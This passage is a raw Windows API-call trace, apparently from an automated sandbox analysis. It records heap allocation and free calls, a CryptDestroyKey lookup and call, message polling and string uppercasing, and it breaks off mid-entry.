[0088.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.248] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyKey") returned 0x763afa60 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.248] CryptDestroyKey (hKey=0x9a40c0) returned 1 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0088.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0088.249] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.250] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.250] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.250] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0088.251] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.251] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.251] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.251] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0088.251] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0088.252] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0088.252] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0088.252] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0088.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c70 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f28 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f10 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0088.255] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.255] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.255] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0088.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0088.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e00 [0088.255] PeekMessageW (in: 